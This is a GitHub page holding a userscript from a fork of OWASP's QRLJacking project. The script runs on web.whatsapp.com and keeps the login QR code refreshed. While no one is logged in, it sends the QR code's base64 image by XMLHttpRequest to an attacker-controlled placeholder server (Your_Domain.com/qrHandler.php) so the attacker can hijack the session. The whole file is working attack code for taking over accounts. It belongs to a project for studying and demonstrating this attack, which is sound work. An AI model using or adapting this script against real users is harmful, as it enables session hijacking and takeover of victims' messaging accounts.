forked from OWASP/QRLJacking
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathWhatsAppQRJackingModule.js
33 lines (32 loc) · 1.71 KB
/
WhatsAppQRJackingModule.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
// ==UserScript==
// @name WhatsApp QRJacking module
// @namespace Seekuritylabs (@Seekurity)
// The code will be injected in web.whatsapp.com web page and periodically searching for the element which holds the
// QR Code image then will perform an XHR request to send this QR image code "base64" code to our server side php script
// which is responsible for converting and storing this "base64 code" to an image file. Also the code is responsible to
// wake WhatsApp’s QR Code if it is inactive and needs the attacker's interaction to reload it.
// ==/UserScript==
var myTimer;
myTimer = window.setInterval(loopForQR, 3000);
function loopForQR() {
if (document.readyState == 'complete') {
$service = window.location.href;
if ($service.indexOf('web.whatsapp.com') >= 0)
{
//Do some clicks to refresh the qr code if went inactive - Always wakeup the qrcode, Never sleep :D
if (document.getElementsByClassName('qr-button')[0] !== undefined)
{
document.getElementsByClassName('qr-button')[0].click();
}
//Checking the availability of the qr code - in our example If WhatsApp is not logged in send us the qr code, If not, Do not exhaust our server with false qr code update requests;
if (document.getElementsByClassName('icon icon-chat')[0] == null)
{
//Mirror the QR Code to our server
//This element for example "document.getElementsByTagName('img')[0].src" is WhatsApp's QR code element which contains the base64 value of WhatsApp's qr code!
var xhttp = new XMLHttpRequest();
xhttp.open('GET', 'https://www.Your_Domain.com/qrHandler.php?c=' + document.getElementsByTagName('img')[0].src, true);
xhttp.send();
}
}
}
}